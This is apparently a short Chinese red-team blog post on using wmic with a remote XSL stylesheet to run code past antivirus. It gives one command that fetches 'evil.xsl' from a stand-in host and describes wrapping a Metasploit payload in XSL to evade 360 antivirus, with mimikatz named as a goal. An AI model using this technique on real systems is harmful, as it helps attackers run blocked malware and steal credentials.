前言
前段时间,@subTee放了一个好玩的red team tips,利用wmic来进行bypass。
正文
命令如下
wmic os get /FORMAT:”https://example.com/evil.xsl”
还给了一个demo
我们先利用这个demo试试
发现没问题。
然后我发现有些同学就开始自以为是,以为修改其中的命令就能做到bypass。。。
比如有直接把命令改成木马的
我就想说了,@subTee辛辛苦苦发现这么一个bypass技巧,仅仅是让你把calc改成其他命令的?
那正确操作是什么呢,我们来深入下。
我们看下他的xsl文件格式,发现跟xml格式一样,而且跟之前msxsl的bypass很像。
那我们的目的肯定不是仅仅去执行我们正常就能执行的命令,而是比如能够执行msf payload、mimikatz这种平常被杀软拦截的payload。
首先我们先利用msf生成一个payload
先尝试利用rundll32调用dll试试
拦截,并且把msf.dll杀掉了。
我们来把dll改成我们之前的xsl格式文件
执行看看
看到成功执行,并且绕过了360。
后续
我觉得,这才是@subTee 想让我们看到的,而不是看个表面。